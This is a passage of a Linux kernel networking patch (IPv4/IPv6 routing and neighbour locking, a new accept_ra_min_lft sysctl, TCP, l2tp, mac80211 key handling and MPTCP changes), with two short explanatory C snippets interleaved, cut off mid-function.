+@@ -1140,14 +1140,14 @@ static bool ipv4_good_nh(const struct fib_nh *nh)
+ 	int state = NUD_REACHABLE;
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	n = __ipv4_neigh_lookup_noref(nh->fib_nh_dev,
+ 				      (__force u32)nh->fib_nh_gw4);
+ 	if (n)
+-		state = n->nud_state;
++		state = READ_ONCE(n->nud_state);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return !!(state & NUD_VALID);
+ }
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 84a0a71a6f4e7..9cbaae4f5ee71 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -408,7 +408,7 @@ static struct neighbour *ipv4_neigh_lookup(const struct dst_entry *dst,
+ 	struct net_device *dev = dst->dev;
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	if (likely(rt->rt_gw_family == AF_INET)) {
+ 		n = ip_neigh_gw4(dev, rt->rt_gw4);
+@@ -424,7 +424,7 @@ static struct neighbour *ipv4_neigh_lookup(const struct dst_entry *dst,
+ 	if (!IS_ERR(n) && !refcount_inc_not_zero(&n->refcnt))
+ 		n = NULL;
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return n;
+ }
+@@ -784,7 +784,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
+ 	if (!n)
+ 		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
+ 	if (!IS_ERR(n)) {
+-		if (!(n->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_VALID)) {
+ 			neigh_event_send(n, NULL);
+ 		} else {
+ 			if (fib_lookup(net, fl4, &res, 0) == 0) {
+@@ -3421,6 +3421,8 @@ static int inet_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 				    fa->fa_type == fri.type) {
+ 					fri.offload = READ_ONCE(fa->offload);
+ 					fri.trap = READ_ONCE(fa->trap);
++					fri.offload_failed =
++						READ_ONCE(fa->offload_failed);
+ 					break;
+ 				}
+ 			}
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index fab25d4f3a6f1..96fdde6e42b1b 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1755,16 +1755,13 @@ EXPORT_SYMBOL(tcp_read_sock);
+ 
+ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+-	struct tcp_sock *tp = tcp_sk(sk);
+-	u32 seq = tp->copied_seq;
+ 	struct sk_buff *skb;
+ 	int copied = 0;
+-	u32 offset;
+ 
+ 	if (sk->sk_state == TCP_LISTEN)
+ 		return -ENOTCONN;
+ 
+-	while ((skb = tcp_recv_skb(sk, seq, &offset)) != NULL) {
++	while ((skb = skb_peek(&sk->sk_receive_queue)) != NULL) {
+ 		u8 tcp_flags;
+ 		int used;
+ 
+@@ -1777,13 +1774,10 @@ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 				copied = used;
+ 			break;
+ 		}
+-		seq += used;
+ 		copied += used;
+ 
+-		if (tcp_flags & TCPHDR_FIN) {
+-			++seq;
++		if (tcp_flags & TCPHDR_FIN)
+ 			break;
+-		}
+ 	}
+ 	return copied;
+ }
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index 5f93918c063c7..f53380fd89bcf 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -217,6 +217,7 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 				  int *addr_len)
+ {
+ 	struct tcp_sock *tcp = tcp_sk(sk);
++	int peek = flags & MSG_PEEK;
+ 	u32 seq = tcp->copied_seq;
+ 	struct sk_psock *psock;
+ 	int copied = 0;
+@@ -306,7 +307,8 @@ msg_bytes_ready:
+ 		copied = -EAGAIN;
+ 	}
+ out:
+-	WRITE_ONCE(tcp->copied_seq, seq);
++	if (!peek)
++		WRITE_ONCE(tcp->copied_seq, seq);
+ 	tcp_rcv_space_adjust(sk);
+ 	if (copied > 0)
+ 		__tcp_cleanup_rbuf(sk, copied);
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index c697836f2b5b4..068221e742425 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -243,6 +243,19 @@ static void tcp_measure_rcv_mss(struct sock *sk, const struct sk_buff *skb)
+ 		if (unlikely(len > icsk->icsk_ack.rcv_mss +
+ 				   MAX_TCP_OPTION_SPACE))
+ 			tcp_gro_dev_warn(sk, skb, len);
++		/* If the skb has a len of exactly 1*MSS and has the PSH bit
++		 * set then it is likely the end of an application write. So
++		 * more data may not be arriving soon, and yet the data sender
++		 * may be waiting for an ACK if cwnd-bound or using TX zero
++		 * copy. So we set ICSK_ACK_PUSHED here so that
++		 * tcp_cleanup_rbuf() will send an ACK immediately if the app
++		 * reads all of the data and is not ping-pong. If len > MSS
++		 * then this logic does not matter (and does not hurt) because
++		 * tcp_cleanup_rbuf() will always ACK immediately if the app
++		 * reads data and there is more than an MSS of unACKed data.
++		 */
++		if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_PSH)
++			icsk->icsk_ack.pending |= ICSK_ACK_PUSHED;
+ 	} else {
+ 		/* Otherwise, we make more careful check taking into account,
+ 		 * that SACKs block is variable.
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index dc3166e56169f..5921b0f6f9f41 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -177,8 +177,7 @@ static void tcp_event_data_sent(struct tcp_sock *tp,
+ }
+ 
+ /* Account for an ACK we sent. */
+-static inline void tcp_event_ack_sent(struct sock *sk, unsigned int pkts,
+-				      u32 rcv_nxt)
++static inline void tcp_event_ack_sent(struct sock *sk, u32 rcv_nxt)
+ {
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 
+@@ -192,7 +191,7 @@ static inline void tcp_event_ack_sent(struct sock *sk, unsigned int pkts,
+ 
+ 	if (unlikely(rcv_nxt != tp->rcv_nxt))
+ 		return;  /* Special ACK sent by DCTCP to reflect ECN */
+-	tcp_dec_quickack_mode(sk, pkts);
++	tcp_dec_quickack_mode(sk);
+ 	inet_csk_clear_xmit_timer(sk, ICSK_TIME_DACK);
+ }
+ 
+@@ -1373,7 +1372,7 @@ static int __tcp_transmit_skb(struct sock *sk, struct sk_buff *skb,
+ 			   sk, skb);
+ 
+ 	if (likely(tcb->tcp_flags & TCPHDR_ACK))
+-		tcp_event_ack_sent(sk, tcp_skb_pcount(skb), rcv_nxt);
++		tcp_event_ack_sent(sk, rcv_nxt);
+ 
+ 	if (skb->len != tcp_header_size) {
+ 		tcp_event_data_sent(tp, sk);
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 83be842198244..c63ccd39fc552 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -202,6 +202,7 @@ static struct ipv6_devconf ipv6_devconf __read_mostly = {
+ 	.ra_defrtr_metric	= IP6_RT_PRIO_USER,
+ 	.accept_ra_from_local	= 0,
+ 	.accept_ra_min_hop_limit= 1,
++	.accept_ra_min_lft	= 0,
+ 	.accept_ra_pinfo	= 1,
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+ 	.accept_ra_rtr_pref	= 1,
+@@ -262,6 +263,7 @@ static struct ipv6_devconf ipv6_devconf_dflt __read_mostly = {
+ 	.ra_defrtr_metric	= IP6_RT_PRIO_USER,
+ 	.accept_ra_from_local	= 0,
+ 	.accept_ra_min_hop_limit= 1,
++	.accept_ra_min_lft	= 0,
+ 	.accept_ra_pinfo	= 1,
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+ 	.accept_ra_rtr_pref	= 1,
+@@ -1033,7 +1035,7 @@ static int ipv6_add_addr_hash(struct net_device *dev, struct inet6_ifaddr *ifa)
+ 	unsigned int hash = inet6_addr_hash(net, &ifa->addr);
+ 	int err = 0;
+ 
+-	spin_lock(&net->ipv6.addrconf_hash_lock);
++	spin_lock_bh(&net->ipv6.addrconf_hash_lock);
+ 
+ 	/* Ignore adding duplicate addresses on an interface */
+ 	if (ipv6_chk_same_addr(net, &ifa->addr, dev, hash)) {
+@@ -1043,7 +1045,7 @@ static int ipv6_add_addr_hash(struct net_device *dev, struct inet6_ifaddr *ifa)
+ 		hlist_add_head_rcu(&ifa->addr_lst, &net->ipv6.inet6_addr_lst[hash]);
+ 	}
+ 
+-	spin_unlock(&net->ipv6.addrconf_hash_lock);
++	spin_unlock_bh(&net->ipv6.addrconf_hash_lock);
+ 
+ 	return err;
+ }
+@@ -1138,15 +1140,15 @@ ipv6_add_addr(struct inet6_dev *idev, struct ifa6_config *cfg,
+ 	/* For caller */
+ 	refcount_set(&ifa->refcnt, 1);
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	err = ipv6_add_addr_hash(idev->dev, ifa);
+ 	if (err < 0) {
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		goto out;
+ 	}
+ 
+-	write_lock(&idev->lock);
++	write_lock_bh(&idev->lock);
+ 
+ 	/* Add to inet6_dev unicast addr list. */
+ 	ipv6_link_dev_addr(idev, ifa);
+@@ -1157,9 +1159,9 @@ ipv6_add_addr(struct inet6_dev *idev, struct ifa6_config *cfg,
+ 	}
+ 
+ 	in6_ifa_hold(ifa);
+-	write_unlock(&idev->lock);
++	write_unlock_bh(&idev->lock);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	inet6addr_notifier_call_chain(NETDEV_UP, ifa);
+ out:
+@@ -2731,6 +2733,9 @@ void addrconf_prefix_rcv(struct net_device *dev, u8 *opt, int len, bool sllao)
+ 		return;
+ 	}
+ 
++	if (valid_lft != 0 && valid_lft < in6_dev->cnf.accept_ra_min_lft)
++		goto put;
++
+ 	/*
+ 	 *	Two things going on here:
+ 	 *	1) Add routes for on-link prefixes
+@@ -5601,6 +5606,7 @@ static inline void ipv6_store_devconf(struct ipv6_devconf *cnf,
+ 	array[DEVCONF_IOAM6_ID_WIDE] = cnf->ioam6_id_wide;
+ 	array[DEVCONF_NDISC_EVICT_NOCARRIER] = cnf->ndisc_evict_nocarrier;
+ 	array[DEVCONF_ACCEPT_UNTRACKED_NA] = cnf->accept_untracked_na;
++	array[DEVCONF_ACCEPT_RA_MIN_LFT] = cnf->accept_ra_min_lft;
+ }
+ 
+ static inline size_t inet6_ifla6_size(void)
+@@ -6794,6 +6800,13 @@ static const struct ctl_table addrconf_sysctl[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec,
+ 	},
++	{
++		.procname	= "accept_ra_min_lft",
++		.data		= &ipv6_devconf.accept_ra_min_lft,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec,
++	},
+ 	{
+ 		.procname	= "accept_ra_pinfo",
+ 		.data		= &ipv6_devconf.accept_ra_pinfo,
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index 413f66781e50d..eb6640f9a7921 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -2492,7 +2492,7 @@ static int ipv6_route_native_seq_show(struct seq_file *seq, void *v)
+ 	const struct net_device *dev;
+ 
+ 	if (rt->nh)
+-		fib6_nh = nexthop_fib6_nh_bh(rt->nh);
++		fib6_nh = nexthop_fib6_nh(rt->nh);
+ 
+ 	seq_printf(seq, "%pi6 %02x ", &rt->fib6_dst.addr, rt->fib6_dst.plen);
+ 
+@@ -2557,14 +2557,14 @@ static struct fib6_table *ipv6_route_seq_next_table(struct fib6_table *tbl,
+ 
+ 	if (tbl) {
+ 		h = (tbl->tb6_id & (FIB6_TABLE_HASHSZ - 1)) + 1;
+-		node = rcu_dereference_bh(hlist_next_rcu(&tbl->tb6_hlist));
++		node = rcu_dereference(hlist_next_rcu(&tbl->tb6_hlist));
+ 	} else {
+ 		h = 0;
+ 		node = NULL;
+ 	}
+ 
+ 	while (!node && h < FIB6_TABLE_HASHSZ) {
+-		node = rcu_dereference_bh(
++		node = rcu_dereference(
+ 			hlist_first_rcu(&net->ipv6.fib_table_hash[h++]));
+ 	}
+ 	return hlist_entry_safe(node, struct fib6_table, tb6_hlist);
+@@ -2594,7 +2594,7 @@ static void *ipv6_route_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 	if (!v)
+ 		goto iter_table;
+ 
+-	n = rcu_dereference_bh(((struct fib6_info *)v)->fib6_next);
++	n = rcu_dereference(((struct fib6_info *)v)->fib6_next);
+ 	if (n)
+ 		return n;
+ 
+@@ -2620,12 +2620,12 @@ iter_table:
+ }
+ 
+ static void *ipv6_route_seq_start(struct seq_file *seq, loff_t *pos)
+-	__acquires(RCU_BH)
++	__acquires(RCU)
+ {
+ 	struct net *net = seq_file_net(seq);
+ 	struct ipv6_route_iter *iter = seq->private;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	iter->tbl = ipv6_route_seq_next_table(NULL, net);
+ 	iter->skip = *pos;
+ 
+@@ -2646,7 +2646,7 @@ static bool ipv6_route_iter_active(struct ipv6_route_iter *iter)
+ }
+ 
+ static void ipv6_route_native_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU_BH)
++	__releases(RCU)
+ {
+ 	struct net *net = seq_file_net(seq);
+ 	struct ipv6_route_iter *iter = seq->private;
+@@ -2654,7 +2654,7 @@ static void ipv6_route_native_seq_stop(struct seq_file *seq, void *v)
+ 	if (ipv6_route_iter_active(iter))
+ 		fib6_walker_unlink(net, &iter->w);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ #if IS_BUILTIN(CONFIG_IPV6) && defined(CONFIG_BPF_SYSCALL)
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 34192f7a166fb..ce2c5e728745f 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -116,7 +116,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 			return res;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	nexthop = rt6_nexthop((struct rt6_info *)dst, daddr);
+ 	neigh = __ipv6_neigh_lookup_noref(dev, nexthop);
+ 
+@@ -124,7 +124,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 		if (unlikely(!neigh))
+ 			neigh = __neigh_create(&nd_tbl, nexthop, dev, false);
+ 		if (IS_ERR(neigh)) {
+-			rcu_read_unlock_bh();
++			rcu_read_unlock();
+ 			IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTNOROUTES);
+ 			kfree_skb_reason(skb, SKB_DROP_REASON_NEIGH_CREATEFAIL);
+ 			return -EINVAL;
+@@ -132,7 +132,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 	}
+ 	sock_confirm_neigh(skb, neigh);
+ 	ret = neigh_output(neigh, skb, false);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	return ret;
+ }
+ 
+@@ -1150,11 +1150,11 @@ static int ip6_dst_lookup_tail(struct net *net, const struct sock *sk,
+ 	 * dst entry of the nexthop router
+ 	 */
+ 	rt = (struct rt6_info *) *dst;
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref(rt->dst.dev,
+ 				      rt6_nexthop(rt, &fl6->daddr));
+-	err = n && !(n->nud_state & NUD_VALID) ? -EINVAL : 0;
+-	rcu_read_unlock_bh();
++	err = n && !(READ_ONCE(n->nud_state) & NUD_VALID) ? -EINVAL : 0;
++	rcu_read_unlock();
+ 
+ 	if (err) {
+ 		struct inet6_ifaddr *ifp;
+diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
+index a4d43eb45a9de..8c5a99fe68030 100644
+--- a/net/ipv6/ndisc.c
++++ b/net/ipv6/ndisc.c
+@@ -746,7 +746,7 @@ static void ndisc_solicit(struct neighbour *neigh, struct sk_buff *skb)
+ 		saddr = &ipv6_hdr(skb)->saddr;
+ 	probes -= NEIGH_VAR(neigh->parms, UCAST_PROBES);
+ 	if (probes < 0) {
+-		if (!(neigh->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(neigh->nud_state) & NUD_VALID)) {
+ 			ND_PRINTK(1, dbg,
+ 				  "%s: trying to ucast probe in NUD_INVALID: %pI6\n",
+ 				  __func__, target);
+@@ -1092,7 +1092,7 @@ static void ndisc_recv_na(struct sk_buff *skb)
+ 		u8 old_flags = neigh->flags;
+ 		struct net *net = dev_net(dev);
+ 
+-		if (neigh->nud_state & NUD_FAILED)
++		if (READ_ONCE(neigh->nud_state) & NUD_FAILED)
+ 			goto out;
+ 
+ 		/*
+@@ -1331,6 +1331,14 @@ static void ndisc_router_discovery(struct sk_buff *skb)
+ 		goto skip_defrtr;
+ 	}
+ 
++	lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);
++	if (lifetime != 0 && lifetime < in6_dev->cnf.accept_ra_min_lft) {
++		ND_PRINTK(2, info,
++			  "RA: router lifetime (%ds) is too short: %s\n",
++			  lifetime, skb->dev->name);
++		goto skip_defrtr;
++	}
++
+ 	/* Do not accept RA with source-addr found on local machine unless
+ 	 * accept_ra_from_local is set to true.
+ 	 */
+@@ -1343,8 +1351,6 @@ static void ndisc_router_discovery(struct sk_buff *skb)
+ 		goto skip_defrtr;
+ 	}
+ 
+-	lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);
+-
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+ 	pref = ra_msg->icmph.icmp6_router_pref;
+ 	/* 10b is handled as if it were 00b (medium) */
+@@ -1519,6 +1525,9 @@ skip_linkparms:
+ 			if (ri->prefix_len == 0 &&
+ 			    !in6_dev->cnf.accept_ra_defrtr)
+ 				continue;
++			if (ri->lifetime != 0 &&
++			    ntohl(ri->lifetime) < in6_dev->cnf.accept_ra_min_lft)
++				continue;
+ 			if (ri->prefix_len < in6_dev->cnf.accept_ra_rt_info_min_plen)
+ 				continue;
+ 			if (ri->prefix_len > in6_dev->cnf.accept_ra_rt_info_max_plen)
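
Both new checks above compare against accept_ra_min_lft after converting from network byte order: ntohs() for the 16-bit router lifetime, ntohl() for the 32-bit route-information lifetime. A minimal stand-alone version of the same filter (function and parameter names are illustrative, not from the kernel):

	#include <stdio.h>
	#include <stdint.h>
	#include <arpa/inet.h>

	/* Mirrors the RA checks: a lifetime of 0 means "withdraw" and is
	 * always processed; a nonzero lifetime shorter than the configured
	 * minimum is ignored. min_lft plays the role of accept_ra_min_lft.
	 */
	static int ra_lifetime_ok(uint32_t lifetime_be32, uint32_t min_lft)
	{
		uint32_t lifetime = ntohl(lifetime_be32);

		return lifetime == 0 || lifetime >= min_lft;
	}

	int main(void)
	{
		printf("%d\n", ra_lifetime_ok(htonl(30), 900));   /* 0: too short */
		printf("%d\n", ra_lifetime_ok(htonl(0), 900));    /* 1: withdrawal */
		printf("%d\n", ra_lifetime_ok(htonl(1800), 900)); /* 1: long enough */
		return 0;
	}
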
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 93957b20fccce..0bcdb675ba2c1 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -636,15 +636,15 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 
+ 	nh_gw = &fib6_nh->fib_nh_gw6;
+ 	dev = fib6_nh->fib_nh_dev;
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	last_probe = READ_ONCE(fib6_nh->last_probe);
+ 	idev = __in6_dev_get(dev);
+ 	neigh = __ipv6_neigh_lookup_noref(dev, nh_gw);
+ 	if (neigh) {
+-		if (neigh->nud_state & NUD_VALID)
++		if (READ_ONCE(neigh->nud_state) & NUD_VALID)
+ 			goto out;
+ 
+-		write_lock(&neigh->lock);
++		write_lock_bh(&neigh->lock);
+ 		if (!(neigh->nud_state & NUD_VALID) &&
+ 		    time_after(jiffies,
+ 			       neigh->updated + idev->cnf.rtr_probe_interval)) {
+@@ -652,7 +652,7 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 			if (work)
+ 				__neigh_set_probe_once(neigh);
+ 		}
+-		write_unlock(&neigh->lock);
++		write_unlock_bh(&neigh->lock);
+ 	} else if (time_after(jiffies, last_probe +
+ 				       idev->cnf.rtr_probe_interval)) {
+ 		work = kmalloc(sizeof(*work), GFP_ATOMIC);
+@@ -670,7 +670,7 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 	}
+ 
+ out:
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ #else
+ static inline void rt6_probe(struct fib6_nh *fib6_nh)
+@@ -686,25 +686,25 @@ static enum rt6_nud_state rt6_check_neigh(const struct fib6_nh *fib6_nh)
+ 	enum rt6_nud_state ret = RT6_NUD_FAIL_HARD;
+ 	struct neighbour *neigh;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	neigh = __ipv6_neigh_lookup_noref(fib6_nh->fib_nh_dev,
+ 					  &fib6_nh->fib_nh_gw6);
+ 	if (neigh) {
+-		read_lock(&neigh->lock);
+-		if (neigh->nud_state & NUD_VALID)
++		u8 nud_state = READ_ONCE(neigh->nud_state);
++
++		if (nud_state & NUD_VALID)
+ 			ret = RT6_NUD_SUCCEED;
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+-		else if (!(neigh->nud_state & NUD_FAILED))
++		else if (!(nud_state & NUD_FAILED))
+ 			ret = RT6_NUD_SUCCEED;
+ 		else
+ 			ret = RT6_NUD_FAIL_PROBE;
+ #endif
+-		read_unlock(&neigh->lock);
+ 	} else {
+ 		ret = IS_ENABLED(CONFIG_IPV6_ROUTER_PREF) ?
+ 		      RT6_NUD_SUCCEED : RT6_NUD_FAIL_DO_RR;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return ret;
+ }
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 4bdd356bb5c46..7be89dcfd5fc5 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1644,9 +1644,12 @@ process:
+ 		struct sock *nsk;
+ 
+ 		sk = req->rsk_listener;
+-		drop_reason = tcp_inbound_md5_hash(sk, skb,
+-						   &hdr->saddr, &hdr->daddr,
+-						   AF_INET6, dif, sdif);
++		if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
++			drop_reason = SKB_DROP_REASON_XFRM_POLICY;
++		else
++			drop_reason = tcp_inbound_md5_hash(sk, skb,
++							   &hdr->saddr, &hdr->daddr,
++							   AF_INET6, dif, sdif);
+ 		if (drop_reason) {
+ 			sk_drops_add(sk, skb);
+ 			reqsk_put(req);
+@@ -1693,6 +1696,7 @@ process:
+ 			}
+ 			goto discard_and_relse;
+ 		}
++		nf_reset_ct(skb);
+ 		if (nsk == sk) {
+ 			reqsk_put(req);
+ 			tcp_v6_restore_cb(skb);
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index bce4132b0a5c8..314ec3a51e8de 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -510,7 +510,6 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	 */
+ 	if (len > INT_MAX - transhdrlen)
+ 		return -EMSGSIZE;
+-	ulen = len + transhdrlen;
+ 
+ 	/* Mirror BSD error message compatibility */
+ 	if (msg->msg_flags & MSG_OOB)
+@@ -631,6 +630,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ back_from_confirm:
+ 	lock_sock(sk);
++	ulen = len + (skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0);
+ 	err = ip6_append_data(sk, ip_generic_getfrag, msg,
+ 			      ulen, transhdrlen, &ipc6,
+ 			      &fl6, (struct rt6_info *)dst,
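
The ulen line above needs the parentheses because the conditional operator binds more loosely than +; without them the whole sum becomes the ternary condition and ulen degenerates to transhdrlen. A stand-alone demonstration (illustrative only, not part of the patch):

	#include <stdio.h>

	int main(void)
	{
		size_t len = 100, transhdrlen = 8;
		int queue_empty = 1;

		/* Wrong: parsed as (len + queue_empty) ? transhdrlen : 0 */
		size_t bad = len + queue_empty ? transhdrlen : 0;
		/* Right: add the header length only for the first fragment */
		size_t good = len + (queue_empty ? transhdrlen : 0);

		printf("bad=%zu good=%zu\n", bad, good); /* bad=8 good=108 */
		return 0;
	}
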
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index cf3453b532d67..0167413d56972 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -566,6 +566,9 @@ static int ieee80211_add_key(struct wiphy *wiphy, struct net_device *dev,
+ 	}
+ 
+ 	err = ieee80211_key_link(key, link, sta);
++	/* KRACK protection, shouldn't happen but just silently accept key */
++	if (err == -EALREADY)
++		err = 0;
+ 
+  out_unlock:
+ 	mutex_unlock(&local->sta_mtx);
+diff --git a/net/mac80211/key.c b/net/mac80211/key.c
+index e8f6c1e5eabfc..23bb24243c6e9 100644
+--- a/net/mac80211/key.c
++++ b/net/mac80211/key.c
+@@ -901,7 +901,7 @@ int ieee80211_key_link(struct ieee80211_key *key,
+ 	 */
+ 	if (ieee80211_key_identical(sdata, old_key, key)) {
+ 		ieee80211_key_free_unused(key);
+-		ret = 0;
++		ret = -EALREADY;
+ 		goto out;
+ 	}
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 9127a7fd5269c..5d845fcf3d09e 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -2047,7 +2047,7 @@ static int mptcp_event_put_token_and_ssk(struct sk_buff *skb,
+ 	    nla_put_s32(skb, MPTCP_ATTR_IF_IDX, ssk->sk_bound_dev_if))
+ 		return -EMSGSIZE;
+ 
+-	sk_err = ssk->sk_err;
++	sk_err = READ_ONCE(ssk->sk_err);
+ 	if (sk_err && sk->sk_state == TCP_ESTABLISHED &&
+ 	    nla_put_u8(skb, MPTCP_ATTR_ERROR, sk_err))
+ 		return -EMSGSIZE;
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 8a2aa63caa51f..38cbdc66d8bff 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -309,12 +309,6 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 		goto create_err;
+ 	}
+ 
+-	if (addr_l.id == 0) {
+-		NL_SET_ERR_MSG_ATTR(info->extack, laddr, "missing local addr id");
+-		err = -EINVAL;
+-		goto create_err;
+-	}
+-
+ 	err = mptcp_pm_parse_addr(raddr, info, &addr_r);
+ 	if (err < 0) {
+ 		NL_SET_ERR_MSG_ATTR(info->extack, raddr, "error parsing remote addr");
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 6dd880d6b0518..b6e0579e72644 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -401,7 +401,7 @@ drop:
+ 	return false;
+ }
+ 
+-static void mptcp_stop_timer(struct sock *sk)
++static void mptcp_stop_rtx_timer(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 
+@@ -765,6 +765,46 @@ static bool __mptcp_ofo_queue(struct mptcp_sock *msk)
+ 	return moved;
+ }
+ 
++static bool __mptcp_subflow_error_report(struct sock *sk, struct sock *ssk)
++{
++	int err = sock_error(ssk);
++	int ssk_state;
++
++	if (!err)
++		return false;
++
++	/* only propagate errors on fallen-back sockets or
++	 * on MPC connect
++	 */
++	if (sk->sk_state != TCP_SYN_SENT && !__mptcp_check_fallback(mptcp_sk(sk)))
++		return false;
++
++	/* We need to propagate only transition to CLOSE state.
++	 * Orphaned socket will see such state change via
++	 * subflow_sched_work_if_closed() and that path will properly
++	 * destroy the msk as needed.
++	 */
++	ssk_state = inet_sk_state_load(ssk);
++	if (ssk_state == TCP_CLOSE && !sock_flag(sk, SOCK_DEAD))
++		inet_sk_state_store(sk, ssk_state);
++	WRITE_ONCE(sk->sk_err, -err);
++
++	/* This barrier is coupled with smp_rmb() in mptcp_poll() */
++	smp_wmb();
++	sk_error_report(sk);
++	return true;
++}
++
++void __mptcp_error_report(struct sock *sk)
++{
++	struct mptcp_subflow_context *subflow;
++	struct mptcp_sock *msk = mptcp_sk(sk);
++
++	mptcp_for_each_subflow(msk, subflow)
++		if (__mptcp_subflow_error_report(sk, mptcp_subflow_tcp_sock(subflow)))
++			break;
++}
++
+ /* In most cases we will be able to lock the mptcp socket.  If it's already
+  * owned, we need to defer to the work queue to avoid ABBA deadlock.
+  */
+@@ -846,6 +886,7 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 
+ 	mptcp_sockopt_sync_locked(msk, ssk);
+ 	mptcp_subflow_joined(msk, ssk);
++	mptcp_stop_tout_timer(sk);
+ 	return true;
+ }
+ 
+@@ -865,12 +906,12 @@ static void __mptcp_flush_join_list(struct sock *sk, struct list_head *join_list
+ 	}
+ }
+ 
+-static bool mptcp_timer_pending(struct sock *sk)
++static bool mptcp_rtx_timer_pending(struct sock *sk)
+ {
